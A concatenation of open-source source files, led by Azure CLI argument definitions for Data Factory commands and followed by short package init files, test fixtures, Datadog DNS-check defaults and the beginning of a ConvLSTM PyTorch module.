c.argument('update_delay_offset', type=str, help='The time offset (in hours) in the day, e.g., PT03H is 3 '
'hours. The integration runtime auto update will happen on that time.')
with self.argument_context('datafactory integration-runtime delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime get-connection-info') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime get-monitoring-data') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime get-status') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime list-auth-key') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.')
with self.argument_context('datafactory integration-runtime regenerate-auth-key') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('key_name', arg_type=get_enum_type(['authKey1', 'authKey2']), help='The name of the authentication '
'key to regenerate.')
with self.argument_context('datafactory integration-runtime remove-link') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('linked_factory_name', type=str, help='The data factory name for linked integration runtime.')
with self.argument_context('datafactory integration-runtime start') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime stop') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime sync-credentials') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime upgrade') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
with self.argument_context('datafactory integration-runtime wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', options_list=['--name', '-n', '--integration-runtime-name'], type=str,
help='The integration runtime name.', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the integration runtime entity. Should only be specified '
'for get. If the ETag matches the existing entity tag, or if * was provided, then no content will '
'be returned.')
with self.argument_context('datafactory integration-runtime-node show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.', id_part='child_name_1')
c.argument('node_name', type=str, help='The integration runtime node name.', id_part='child_name_2')
with self.argument_context('datafactory integration-runtime-node update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.', id_part='child_name_1')
c.argument('node_name', type=str, help='The integration runtime node name.', id_part='child_name_2')
c.argument('concurrent_jobs_limit', type=int, help='The number of concurrent jobs permitted to run on the '
'integration runtime node. Values between 1 and maxConcurrentJobs(inclusive) are allowed.')
with self.argument_context('datafactory integration-runtime-node delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.', id_part='child_name_1')
c.argument('node_name', type=str, help='The integration runtime node name.', id_part='child_name_2')
with self.argument_context('datafactory integration-runtime-node get-ip-address') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('integration_runtime_name', type=str, help='The integration runtime name.', id_part='child_name_1')
c.argument('node_name', type=str, help='The integration runtime node name.', id_part='child_name_2')
with self.argument_context('datafactory linked-service list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory linked-service show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('linked_service_name', options_list=['--name', '-n', '--linked-service-name'], type=str, help='The '
'linked service name.', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the linked service entity. Should only be specified for '
'get. If the ETag matches the existing entity tag, or if * was provided, then no content will be '
'returned.')
with self.argument_context('datafactory linked-service create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('linked_service_name', options_list=['--name', '-n', '--linked-service-name'], type=str, help='The '
'linked service name.')
c.argument('if_match', type=str, help='ETag of the linkedService entity. Should only be specified for update, '
'for which it should match existing entity or can be * for unconditional update.')
c.argument('properties', type=validate_file_or_dict, help='Properties of linked service. Expected value: '
'json-string/json-file/@json-file.')
with self.argument_context('datafactory linked-service update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('linked_service_name', options_list=['--name', '-n', '--linked-service-name'], type=str, help='The '
'linked service name.', id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the linkedService entity. Should only be specified for update, '
'for which it should match existing entity or can be * for unconditional update.')
c.argument('connect_via', type=validate_file_or_dict, help='The integration runtime reference. Expected value: '
'json-string/json-file/@json-file.')
c.argument('description', type=str, help='Linked service description.')
c.argument('parameters', type=validate_file_or_dict, help='Parameters for linked service. Expected value: '
'json-string/json-file/@json-file.')
c.argument('annotations', type=validate_file_or_dict, help='List of tags that can be used for describing the '
'linked service. Expected value: json-string/json-file/@json-file.')
c.ignore('linked_service')
with self.argument_context('datafactory linked-service delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('linked_service_name', options_list=['--name', '-n', '--linked-service-name'], type=str, help='The '
'linked service name.', id_part='child_name_1')
with self.argument_context('datafactory dataset list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory dataset show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('dataset_name', options_list=['--name', '-n', '--dataset-name'], type=str, help='The dataset name.',
id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the dataset entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory dataset create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('dataset_name', options_list=['--name', '-n', '--dataset-name'], type=str,
help='The dataset name.')
c.argument('if_match', type=str, help='ETag of the dataset entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('properties', type=validate_file_or_dict, help='Dataset properties. Expected value: '
'json-string/json-file/@json-file.')
with self.argument_context('datafactory dataset update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('dataset_name', options_list=['--name', '-n', '--dataset-name'], type=str, help='The dataset name.',
id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the dataset entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='Dataset description.')
c.argument('structure', type=validate_file_or_dict, help='Columns that define the structure of the dataset. '
'Type: array (or Expression with resultType array), itemType: DatasetDataElement. Expected value: '
'json-string/json-file/@json-file.')
c.argument('schema', type=validate_file_or_dict, help='Columns that define the physical type schema of the '
'dataset. Type: array (or Expression with resultType array), itemType: DatasetSchemaDataElement. '
'Expected value: json-string/json-file/@json-file.')
c.argument('linked_service_name', type=validate_file_or_dict, help='Linked service reference. Expected value: '
'json-string/json-file/@json-file.')
c.argument('parameters', type=validate_file_or_dict, help='Parameters for dataset. Expected value: '
'json-string/json-file/@json-file.')
c.argument('annotations', type=validate_file_or_dict, help='List of tags that can be used for describing the '
'Dataset. Expected value: json-string/json-file/@json-file.')
c.argument('folder', action=AddFolder, nargs='+', help='The folder that this Dataset is in. If not specified, '
'Dataset will appear at the root level.')
c.ignore('dataset')
with self.argument_context('datafactory dataset delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('dataset_name', options_list=['--name', '-n', '--dataset-name'], type=str, help='The dataset name.',
id_part='child_name_1')
with self.argument_context('datafactory pipeline list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory pipeline show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the pipeline entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory pipeline create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.')
c.argument('if_match', type=str, help='ETag of the pipeline entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('pipeline', type=validate_file_or_dict, help='Pipeline resource definition. Expected value: '
'json-string/json-file/@json-file.')
with self.argument_context('datafactory pipeline update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.', id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the pipeline entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='The description of the pipeline.')
c.argument('activities', type=validate_file_or_dict, help='List of activities in pipeline. Expected value: '
'json-string/json-file/@json-file.')
c.argument('parameters', type=validate_file_or_dict, help='List of parameters for pipeline. Expected value: '
'json-string/json-file/@json-file.')
c.argument('variables', type=validate_file_or_dict, help='List of variables for pipeline. Expected value: '
'json-string/json-file/@json-file.')
c.argument('concurrency', type=int, help='The max number of concurrent runs for the pipeline.')
c.argument('annotations', type=validate_file_or_dict, help='List of tags that can be used for describing the '
'Pipeline. Expected value: json-string/json-file/@json-file.')
c.argument('run_dimensions', type=validate_file_or_dict, help='Dimensions emitted by Pipeline. Expected value: '
'json-string/json-file/@json-file.')
c.argument('duration', type=validate_file_or_dict, help='TimeSpan value, after which an Azure Monitoring '
'Metric is fired. Expected value: json-string/json-file/@json-file.', arg_group='Policy Elapsed '
'Time Metric')
c.argument('folder_name', type=str, help='The name of the folder that this Pipeline is in.',
arg_group='Folder')
c.ignore('pipeline')
with self.argument_context('datafactory pipeline delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.', id_part='child_name_1')
with self.argument_context('datafactory pipeline create-run') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('pipeline_name', options_list=['--name', '-n', '--pipeline-name'], type=str, help='The pipeline '
'name.')
c.argument('reference_pipeline_run_id', type=str, help='The pipeline run identifier. If run ID is specified '
'the parameters of the specified run will be used to create a new run.')
c.argument('is_recovery', arg_type=get_three_state_flag(), help='Recovery mode flag. If recovery mode is set '
'to true, the specified referenced pipeline run and the new run will be grouped under the same '
'groupId.')
c.argument('start_activity_name', type=str, help='In recovery mode, the rerun will start from this activity. '
'If not specified, all activities will run.')
c.argument('start_from_failure', arg_type=get_three_state_flag(), help='In recovery mode, if set to true, the '
'rerun will start from failed activities. The property will be used only if startActivityName is '
'not specified.')
c.argument('parameters', type=validate_file_or_dict, help='Parameters of the pipeline run. These parameters '
'will be used only if the runId is not specified. Expected value: json-string/json-file/@json-file.')
with self.argument_context('datafactory pipeline-run show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_1')
with self.argument_context('datafactory pipeline-run cancel') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_1')
c.argument('is_recursive', arg_type=get_three_state_flag(), help='If true, cancel all the Child pipelines that '
'are triggered by the current pipeline.')
with self.argument_context('datafactory pipeline-run query-by-factory') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('continuation_token', type=str, help='The continuation token for getting the next page of results. '
'Null for first page.')
c.argument('last_updated_after', help='The time at or after which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('last_updated_before', help='The time at or before which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('filters', action=AddFilters, nargs='+', help='List of filters.')
c.argument('order_by', action=AddOrderBy, nargs='+', help='List of OrderBy options.')
with self.argument_context('datafactory activity-run query-by-pipeline-run') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_1')
c.argument('continuation_token', type=str, help='The continuation token for getting the next page of results. '
'Null for first page.')
c.argument('last_updated_after', help='The time at or after which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('last_updated_before', help='The time at or before which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('filters', action=AddFilters, nargs='+', help='List of filters.')
        c.argument('order_by', action=AddOrderBy, nargs='+', help='List of OrderBy options.')
with self.argument_context('datafactory trigger list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory trigger show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the trigger entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory trigger create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str,
help='The trigger name.')
c.argument('if_match', type=str, help='ETag of the trigger entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('properties', type=validate_file_or_dict, help='Properties of the trigger. Expected value: '
'json-string/json-file/@json-file.')
with self.argument_context('datafactory trigger update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the trigger entity. Should only be specified for update, for '
'which it should match existing entity or can be * for unconditional update.')
c.argument('description', type=str, help='Trigger description.')
c.argument('annotations', type=validate_file_or_dict, help='List of tags that can be used for describing the '
'trigger. Expected value: json-string/json-file/@json-file.')
c.ignore('trigger')
with self.argument_context('datafactory trigger delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger get-event-subscription-status') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger query-by-factory') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('continuation_token', type=str, help='The continuation token for getting the next page of results. '
'Null for first page.')
        c.argument('parent_trigger_name', type=str, help='The name of the parent TumblingWindowTrigger to get the '
                   'child rerun triggers.')
with self.argument_context('datafactory trigger start') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger stop') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger subscribe-to-event') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger unsubscribe-from-event') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
with self.argument_context('datafactory trigger wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', options_list=['--name', '-n', '--trigger-name'], type=str, help='The trigger name.',
id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the trigger entity. Should only be specified for get. If '
'the ETag matches the existing entity tag, or if * was provided, then no content will be returned.')
with self.argument_context('datafactory trigger-run cancel') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', type=str, help='The trigger name.', id_part='child_name_1')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_2')
with self.argument_context('datafactory trigger-run query-by-factory') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('continuation_token', type=str, help='The continuation token for getting the next page of results. '
'Null for first page.')
c.argument('last_updated_after', help='The time at or after which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('last_updated_before', help='The time at or before which the run event was updated in \'ISO 8601\' '
'format.')
c.argument('filters', action=AddFilters, nargs='+', help='List of filters.')
        c.argument('order_by', action=AddOrderBy, nargs='+', help='List of OrderBy options.')
with self.argument_context('datafactory trigger-run rerun') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('trigger_name', type=str, help='The trigger name.', id_part='child_name_1')
c.argument('run_id', type=str, help='The pipeline run identifier.', id_part='child_name_2')
with self.argument_context('datafactory managed-virtual-network list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
with self.argument_context('datafactory managed-virtual-network show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--name', '-n', '--managed-virtual-network-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('if_none_match', type=str, help='ETag of the managed Virtual Network entity. Should only be '
'specified for get. If the ETag matches the existing entity tag, or if * was provided, then no '
'content will be returned.')
with self.argument_context('datafactory managed-virtual-network create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('managed_virtual_network_name', options_list=['--name', '-n', '--managed-virtual-network-name'],
type=str, help='Managed virtual network name')
c.argument('if_match', type=str, help='ETag of the managed Virtual Network entity. Should only be specified '
'for update, for which it should match existing entity or can be * for unconditional update.')
with self.argument_context('datafactory managed-virtual-network update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--name', '-n', '--managed-virtual-network-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('if_match', type=str, help='ETag of the managed Virtual Network entity. Should only be specified '
'for update, for which it should match existing entity or can be * for unconditional update.')
c.ignore('managed_virtual_network')
with self.argument_context('datafactory managed-private-endpoint list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name')
with self.argument_context('datafactory managed-private-endpoint show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('managed_private_endpoint_name', options_list=['--name', '-n', '--managed-private-endpoint-name'],
type=str, help='Managed private endpoint name', id_part='child_name_2')
c.argument('if_none_match', type=str, help='ETag of the managed private endpoint entity. Should only be '
'specified for get. If the ETag matches the existing entity tag, or if * was provided, then no '
'content will be returned.')
with self.argument_context('datafactory managed-private-endpoint create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name')
c.argument('managed_private_endpoint_name', options_list=['--name', '-n', '--managed-private-endpoint-name'],
type=str, help='Managed private endpoint name')
c.argument('if_match', type=str, help='ETag of the managed private endpoint entity. Should only be specified '
'for update, for which it should match existing entity or can be * for unconditional update.')
c.argument('fqdns', nargs='+', help='Fully qualified domain names')
c.argument('group_id', type=str, help='The groupId to which the managed private endpoint is created')
c.argument('private_link_resource_id', options_list=['--private-link-resource-id', '--private-link'], type=str,
help='The ARM resource ID of the resource to which the managed private endpoint is created')
with self.argument_context('datafactory managed-private-endpoint update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('managed_private_endpoint_name', options_list=['--name', '-n', '--managed-private-endpoint-name'],
type=str, help='Managed private endpoint name', id_part='child_name_2')
c.argument('if_match', type=str, help='ETag of the managed private endpoint entity. Should only be specified '
'for update, for which it should match existing entity or can be * for unconditional update.')
c.argument('fqdns', nargs='+', help='Fully qualified domain names')
c.argument('group_id', type=str, help='The groupId to which the managed private endpoint is created')
c.argument('private_link_resource_id', options_list=['--private-link-resource-id', '--private-link'], type=str,
help='The ARM resource ID of the resource to which the managed private endpoint is created')
c.ignore('managed_private_endpoint')
with self.argument_context('datafactory managed-private-endpoint delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('factory_name', type=str, help='The factory name.', id_part='name')
c.argument('managed_virtual_network_name', options_list=['--managed-virtual-network-name', '--mvnet-name'],
type=str, help='Managed virtual network name', id_part='child_name_1')
c.argument('managed_private_endpoint_name', options_list=['--name', '-n', '--managed-private-endpoint-name'],
type=str, help='Managed private endpoint name', id_part='child_name_2')
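Several arguments above are declared with `type=validate_file_or_dict` and the help text `json-string/json-file/@json-file`. A minimal sketch of what such a parser might do — an assumption for illustration only, not azure-cli's actual implementation (`file_or_dict` is a hypothetical name):

```python
import json
import os


def file_or_dict(value):
    """Accept a JSON string, a path to a JSON file, or an @-prefixed path."""
    if value.startswith('@'):       # @json-file: strip the marker, read the file
        with open(value[1:]) as f:
            value = f.read()
    elif os.path.exists(value):     # json-file: a plain path to a JSON document
        with open(value) as f:
            value = f.read()
    return json.loads(value)        # json-string: parse the text directly


print(file_or_dict('{"type": "ScheduleTrigger"}'))  # → {'type': 'ScheduleTrigger'}
```

In all three cases the CLI layer ends up handing the command a parsed Python object rather than raw text.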
# File: QuantTorch/DorefaNet.py (repo: Enderdead/BinaryConnect_PyTorch, license: MIT)
from QuantTorch.functions.dorefa_connect import *
from QuantTorch.layers.dorefa_layers import *
# File: MousePosition.py (repo: PratyushRanjanTiwari/Automatic-Form-Filler, license: MIT)
import pyautogui

print(pyautogui.position())
# File: python/datamongo/text/dmo/__init__.py (repo: jiportilla/ontology, license: MIT)
from .text_query_filter import TextQueryFilter
from .text_query_generator import TextQueryGenerator
from .text_query_windower import TextQueryWindower
# File: python/graphiler/utils/__init__.py (repo: xiezhq-hermann/graphiler, license: Apache-2.0)
from .setup import *
from .bench import *
# File: multilingual_t5/r_ic_all_ta/__init__.py (repo: sumanthd17/mt5, license: Apache-2.0)
"""r_ic_all_ta dataset."""

from .r_ic_all_ta import RIcAllTa
# File: tests/conftest.py (repo: Enselic/git-repo-language-trends, license: MIT)
from random import randint
import pytest


@pytest.fixture
def random_output_basename(tmp_path):
    return str(tmp_path / f"output-{randint(1, 100000)}")


@pytest.fixture
def tsv_output_path(random_output_basename):
    return f"{random_output_basename}.tsv"


@pytest.fixture
def csv_output_path(random_output_basename):
    return f"{random_output_basename}.csv"


@pytest.fixture
def svg_output_path(random_output_basename):
    return f"{random_output_basename}.svg"


@pytest.fixture
def png_output_path(random_output_basename):
    return f"{random_output_basename}.png"
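The fixtures above compose one random basename with a per-format suffix. A standalone sketch of the same pattern — plain functions instead of pytest fixtures so it runs outside a test session; the function names are illustrative, not part of the repo:

```python
import re
from pathlib import Path
from random import randint


def make_output_basename(tmp_path: Path) -> str:
    # mirrors random_output_basename: a unique file stem under the tmp dir
    return str(tmp_path / f"output-{randint(1, 100000)}")


def with_suffix(basename: str, ext: str) -> str:
    # mirrors the tsv/csv/svg/png fixtures: basename plus an extension
    return f"{basename}.{ext}"


base = make_output_basename(Path("/tmp"))
assert re.fullmatch(r"/tmp/output-\d+", base)
assert with_suffix(base, "csv").endswith(".csv")
```

Because each fixture depends on `random_output_basename`, all extensions requested within one test share the same stem, while different tests get fresh random stems.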
# File: fastmsa/logging.py (repo: abhan00/fastana, license: Apache-2.0)
from .core._logging import get_logger  # noqa
# File: src/huggingmolecules/models/__init__.py (repo: chrislybaer/huggingmolecules, license: Apache-2.0)
from .models_grover import GroverModel
from .models_mat import MatModel
# File: dns_check/datadog_checks/dns_check/config_models/defaults.py (repo: tdimnet/integrations-core, license: BSD-3-Clause)
# (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from datadog_checks.base.utils.models.fields import get_default_field_value


def shared_default_timeout(field, value):
    return 5


def shared_service(field, value):
    return get_default_field_value(field, value)


def instance_disable_generic_tags(field, value):
    return False


def instance_empty_default_hostname(field, value):
    return False


def instance_min_collection_interval(field, value):
    return 15


def instance_name(field, value):
    return get_default_field_value(field, value)


def instance_nameserver(field, value):
    return get_default_field_value(field, value)


def instance_nameserver_port(field, value):
    return 53


def instance_record_type(field, value):
    return 'A'


def instance_resolves_as(field, value):
    return get_default_field_value(field, value)


def instance_service(field, value):
    return get_default_field_value(field, value)


def instance_tags(field, value):
    return get_default_field_value(field, value)


def instance_timeout(field, value):
    return 5
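These default functions follow a `<scope>_<option>` naming convention. A hedged sketch of how a config model could consume them by name — this is an assumption for illustration, not the actual `datadog_checks` machinery, and `resolve_default` is a made-up helper:

```python
def instance_nameserver_port(field, value):
    # copy of one default function above, so the sketch is self-contained
    return 53


def resolve_default(scope: str, option: str, field=None, value=None):
    # look up the "<scope>_<option>" default function by name, if one exists;
    # otherwise fall back to the value that was passed in
    fn = globals().get(f"{scope}_{option}")
    return fn(field, value) if fn is not None else value


print(resolve_default("instance", "nameserver_port"))  # → 53
```

The convention lets the validation layer stay generic: adding a new option only requires defining one more `instance_*` or `shared_*` function.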
# File: modules/dirsearch/lib/core/controller/__init__.py (repo: Farz7/Darkness, license: MIT)
from .Controller import *
# File: convolution_lstm.py (repo: braraki/Convolution_LSTM_PyTorch, license: MIT)
import torch
import torch.nn as nn
from torch.autograd import Variable
import pdb
''' NOTES
- steps is how many times you recurse over the data (e.g. the length of the trajectory)
- effective_steps is a list of which step outputs you want to save
- the format of the data as-is is [batch size, input channels, h, w, d]
- you need to change it to accept [batch size, trajectory, input channels, h, w, d]
  and then have 'step' index the trajectory
'''
class ConvLSTMCell(nn.Module):
def __init__(self, input_channels, hidden_channels, kernel_size):
super(ConvLSTMCell, self).__init__()
assert hidden_channels % 2 == 0
self.input_channels = input_channels
self.hidden_channels = hidden_channels
